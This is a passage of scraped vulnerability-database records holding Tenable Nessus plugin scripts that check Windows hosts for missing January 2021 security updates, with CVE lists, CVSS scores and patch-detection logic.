value:\"http://www.nessus.org/u?bbb76f59\");\n # https://support.microsoft.com/en-us/help/4598297/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b71d9485\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598297 or Cumulative Update KB4598278.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS21-01\";\nkbs = make_list('4598278', '4598297'); # changed by manual execution of PT scriptsautomation\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"01_2021\",\n bulletin:bulletin,\n rollup_kb_list:[4598297, 4598278])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-22T13:53:37", "description": "The remote Windows host is missing security update 4598275\nor cumulative update 4598285. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1637, CVE-2021-1656,\n CVE-2021-1676, CVE-2021-1696, CVE-2021-1699,\n CVE-2021-1708)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1648, CVE-2021-1649, CVE-2021-1650,\n CVE-2021-1652, CVE-2021-1653, CVE-2021-1654,\n CVE-2021-1655, CVE-2021-1659, CVE-2021-1661,\n CVE-2021-1688, CVE-2021-1693, CVE-2021-1694,\n CVE-2021-1695, CVE-2021-1702, CVE-2021-1704,\n CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678, CVE-2021-1683, CVE-2021-1684)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679,\n CVE-2021-1692)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)", "edition": 5, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598275: Windows 8.1 and Windows Server 2012 R2 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1684", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1710", "CVE-2021-1666", "CVE-2021-1664", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1650", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1648", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1708", "CVE-2021-1683", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1692", "CVE-2021-1637", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598275.NASL", "href": "https://www.tenable.com/plugins/nessus/144888", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144888);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1688\",\n \"CVE-2021-1692\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598285\");\n script_xref(name:\"MSKB\", value:\"4598275\");\n script_xref(name:\"MSFT\", value:\"MS21-4598285\");\n script_xref(name:\"MSFT\", value:\"MS21-4598275\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598275: Windows 8.1 and Windows Server 2012 R2 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598275\nor cumulative update 4598285. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1637, CVE-2021-1656,\n CVE-2021-1676, CVE-2021-1696, CVE-2021-1699,\n CVE-2021-1708)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1648, CVE-2021-1649, CVE-2021-1650,\n CVE-2021-1652, CVE-2021-1653, CVE-2021-1654,\n CVE-2021-1655, CVE-2021-1659, CVE-2021-1661,\n CVE-2021-1688, CVE-2021-1693, CVE-2021-1694,\n CVE-2021-1695, CVE-2021-1702, CVE-2021-1704,\n CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678, CVE-2021-1683, CVE-2021-1684)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679,\n CVE-2021-1692)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598285/windows-8-1-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598275/windows-8-1-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598275 or Cumulative Update KB4598285.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598275',\n '4598285'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598275, 4598285])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-21T13:45:31", "description": "The remote Windows host is missing security update 4598287\nor cumulative update 4598288. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1676, CVE-2021-1696,\n CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1649, CVE-2021-1652, CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659,\n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693,\n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702,\n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)", "edition": 4, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598287: Windows Server 2008 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1666", "CVE-2021-1664", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1699", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1694", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1708", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1657"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598287.NASL", "href": "https://www.tenable.com/plugins/nessus/144878", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144878);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/20\");\n\n script_cve_id(\n \"CVE-2021-1649\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1688\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\"\n );\n script_xref(name:\"MSKB\", value:\"4598287\");\n script_xref(name:\"MSKB\", value:\"4598288\");\n script_xref(name:\"MSFT\", value:\"MS21-4598287\");\n script_xref(name:\"MSFT\", value:\"MS21-4598288\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598287: Windows Server 2008 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598287\nor cumulative update 4598288. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1676, CVE-2021-1696,\n CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1649, CVE-2021-1652, CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659,\n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693,\n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702,\n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)\");\n # https://support.microsoft.com/en-us/help/4598287/windows-server-2008-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?71567e2d\");\n # https://support.microsoft.com/en-us/help/4598288/windows-server-2008-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9cddaa00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598287 or Cumulative Update KB4598288.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1706\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS21-01\";\nkbs = make_list('4598287', '4598288');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"01_2021\",\n bulletin:bulletin,\n rollup_kb_list:[4598287, 4598288])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-22T13:53:37", "description": "The remote Windows host is missing security update 4598289\nor cumulative update 4598279. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1649, CVE-2021-1652, CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659,\n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693,\n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702,\n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1656, CVE-2021-1676,\n CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)", "edition": 5, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598289: Windows 7 and Windows Server 2008 R2 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1666", "CVE-2021-1664", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1708", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598279.NASL", "href": "https://www.tenable.com/plugins/nessus/144877", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144877);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\n \"CVE-2021-1649\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1688\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\"\n );\n script_xref(name:\"MSKB\", value:\"4598279\");\n script_xref(name:\"MSKB\", value:\"4598289\");\n script_xref(name:\"MSFT\", value:\"MS21-4598279\");\n script_xref(name:\"MSFT\", value:\"MS21-4598289\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598289: Windows 7 and Windows Server 2008 R2 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598289\nor cumulative update 4598279. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1649, CVE-2021-1652, CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659,\n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693,\n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702,\n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1656, CVE-2021-1676,\n CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598279/windows-7-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598289/windows-7-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598289 or Cumulative Update KB4598279.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft 